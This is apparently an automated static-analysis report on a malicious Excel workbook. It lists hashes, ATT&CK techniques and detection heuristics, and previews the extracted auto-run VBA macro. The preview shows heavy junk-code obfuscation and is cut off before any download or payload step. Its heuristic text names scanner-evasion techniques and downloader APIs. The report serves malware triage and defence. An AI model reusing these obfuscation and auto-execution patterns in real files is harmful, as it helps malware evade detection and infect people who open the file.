Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0cf2786f8028a35c…

MALICIOUS

Office (OLE)

86.5 KB Created: 2018-07-26 11:41:26 Authoring application: Microsoft Excel First seen: 2018-11-05
MD5: bd7de7c355f89b6c2169203e46a4b3ed SHA-1: 5e27d552ca4dd667d7c2ed7f96fa8256a7a9f5b0 SHA-256: 0cf2786f8028a35c4f4bf90e5c2b0ff96f9f6529b1c7be1403450a8541a0ea51
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains a Workbook_Open VBA macro that is heavily obfuscated, including reassembling API names from split string literals like 'mSxML2'. This macro is designed to execute automatically upon opening the workbook. The presence of CreateObject and the obfuscated code strongly suggests the macro's intent is to download and execute a secondary payload, characteristic of a downloader malware.

Heuristics 6

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 26342 bytes
SHA-256: d808ac452bbcbd7802a8a0efd9901a7f077f4d57a7b540c435c31e15c21f6f3b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
vlGYuI__UmfdJ43_e.Tef586rM4PKESSABWCGx
Dim r8IxGBDqRLB6ly16lk1_
While "L4KtlQv7JnmrwuUUqv61A4pMOccb_XuKGzdD7DdsPtFhWMyCdi5x4G6QL7d" = "HwS1v2aj7PQWlPKjPvGzBmZ8dc7P93Kz9hU57"
Dim To6m2vLKQfrgoe_FbdVUUR5JjCDZWD5OlXaa3XunuRJYhZMpu2E As Currency
Wend
Dim zhkeBtuBxquwMja5
While "ODlMCsriBFdkIyVne7_qA2XqGU769e6xFe7lGmBFzAb" = "NH18SFPPes4Wn5_qvujfIpdn2te148z9Yba8d8k2NoRVki7KhTSDY6t"
Dim hmLEijXVg347JcELwIrQdVGBRvRRhmvhbr2SP2AQyRtcpkuraG As Currency
Wend
Dim f3qnNJeIwwP_w3F
While "Tcbjv55HZaKknUq_j1YF21xbqxE_M_td1" = "VTFRFoLjtPKCh1x_voLVvMco937yz4YqptP_iqbKLfFjlXG6Q9aTfGDGzaR"
Dim MqVtyzdVxiwd_LAHOE3BjuAfzb_JgoHIGWNdyuPsFBSUccUFd8 As Currency
Wend
Dim xA6Xrboz3VuRxGZmUp8fRcyI4g
While "anCVE7ohzFLsovx9247xLJ5zFoH8oTKvcJ__" = "weOxmNPRZlAKqRj4LESOsKOZwq3e5YOduwKVnHJ84kYdn7OU"
Dim tQiVztPjOx_5UuW_UeZ4EMNC5UTFvtuyZfumz3m_fkEyGNlHMYH As Currency
Wend
Dim GfUOeBeZdXHxeBIdx_s
While "Ha2YVdFX5psK3UkmRDPNjTaHjVwjv7twGcOpOE8tX" = "ljtuKOa3X1YfuHx9rx_qfl765CXE4WK_e"
Dim z7sqWWFTpW_SOVTapfP8C1_lxyGzU9AoS_5JDQTZ2UyM2knpDmLz4Fb As Currency
Wend
Dim F3gNO9qUY9NaHVXKz_pAutKJavquJtLg6M6Wv
While "JkVG2akXM5PxmCAu6JVpVwcP5Jnvqe4Y_YocS23QjuM1Z7fqK" = "u9BiqYVF_Kpvyqr_zwMVfZCQ_Ejilz8m7j5e2zR9QUNpKdtDd"
Dim iIRSnS5tdjxwdMMCxNvKG9cM_JKV_iTfDuOxSm5jiFUrJc1_aHpePQsjo_N As Currency
Wend

Dim bGgo4NPsr8XrJRJk_mt
While "CjSJ452yNuBoGNXbaBaZb3tHBBZdLEor65BmH6" = "lsBYB7oQPbvyrihLQHyJG2cWkH_SsLLtRdXqXC1vbtu8"
Dim rVVEHsm2x8xtOmx22UhDNAfLJ1wMQCqWEenMu9I9iS6SpmatN84FKqr As Currency
Wend
Dim qzH4Q5XjuPYns9iE2Jhd4
While "DKfgXB9SGjKXv7WlD1CIsJCP9qun1A5lKwlmlV22YOloMN6AKcwSeS" = "I3HNgqPSaEohK9Ts9q8ItcgWCstsbVMjF2lrcVxJk_xf9"
Dim nB7padETThpTuKx6g1_2DaRUkOk3whonAWWpwBA2GOuS5WrJ_MDMsn4K As Currency
Wend
Dim rj_K2Lgv3BRVwFGdyKtxp9Z
While "LfZ2hdZ5VbK7L6x94r9Y3DTV2_hWf3_esI1nZS8PaE64kI5g_KyEpifHJ" = "D_b6BWbVpMC_Hgjsq7vGZtrI_VTD9xHlrcVRdTXqbf552bzmMU8ksAtRQ"
Dim R5oCXW1DYVoJQNVg_n3yvPfepzlyg2psDAKXsmDHDzaEJb6FkCnVzcd As Currency
Wend
Dim AXHVgtAfgo6EOB7xZjtu6xYTL3dM
While "dLS2jfI_jPeWBS4YMUo_nNLu_qgK8wHnOwBSUDes26LIDVr" = "k49F1LYhO_gv287AvF1FNQiDIy6LqACqr96Q8pQZyMvSwPmt44Y"
Dim BLNcSS56APLzM6yD2BoCEyYQ_eOO3JJQvjAdcek7CsOIlWgV8KurM1SKv7b As Currency
Wend
Dim wCnCz_4Cl5TjVYq_UiOnl7
While "QpYbC5PxqeBw3WpX_qS4alkWRf17leQzzJVUYlzGTFlDSkwknIJ6RCZo_" = "AHfCSJJMK7rAT9a1JhT9fDprNQaTTfwtqOWbRDA5azGm_jSJr_Fc"
Dim Eog7axxAsz2nI8SDj9gFgXgp6Bln8OlOYRmAqZ_dO_Jk7bcEPNjsg9 As Currency
Wend
Dim pG1AXJHCbMlMzSRVH8B1fM6rbh
While "fWso2qYV72zYjRE7qVTMlv82ZtdGXbKGgzn" = "uSwT4xcUYesVstiehWN6tYzMFKQ7dpq1tmTl4BZYGYgUpWuV"
Dim x6mtQ34UbhLqfe1sw1k_Y6je7ywS1dgsZ4HgB7izs8ITyr3lhxgxuo71UF As Currency
Wend
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "vlGYuI__UmfdJ43_e"
Dim mWr8d3BkFCeZhyUZoDtnpvA2lKnLnFtmv3G_y75zGTS6scCdWfxaValzVzUQMx6_Q1mnpTjrG3fTa_GGHIyGRRPTOPm9kllRXSn2yWwC5_Rb5PWPqLHD9wq8jRWXpjFePL6GZORtVuLL_wX83V As String
Dim g5xKXl8j6IbUJCTHMs5wRsdUcvavXlnK8OhXDLF9yYTnyJ4bhpQVzKnwYbrlIJJSePW5d6_Ak682XzfQ29MrSPTvjt9kddxmN_Ggw87kjPu4MuXh5YsI7a9N5kSs7ceFFS As String
Dim hf4xZ_Qdeo_EupK_L7i6Tvn4f6NK7aZJFcjhyTCKAz5kIGT_S_EheHEu2_QdtEgCM49QElI2 As Integer
Dim ASUvBfZwwJENrtvuBPOhUPuftKl5yfYeKe3z1ceg3XJ3jn4SXiATFSCshyBy3d7PtiCKz54htro7 As String

 Function wbEic7AcPkVRpzQtUZvOpM5JuC6r8u6PK4HEtHcLSUZPONFqf_Re__Z(JiEiNdBO4wryLFYwiTN9o5JxddY1yyYvagyPbaDob9TyIpP79ZDq35zOWQDtDJY_V5WoPHSGPheoiTmxLb1Xtr2epi2IVRjQhNbMQkozF5ZTYIoBmOfjSASmB28qOIu78MES2Yfkw_QxQgEe4zfEu)
Dim Gqckj1CAOubz8sEaFmryrNtKMt2w
While "aM61uVVBdJIETz8ZFyo2YXVaF
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.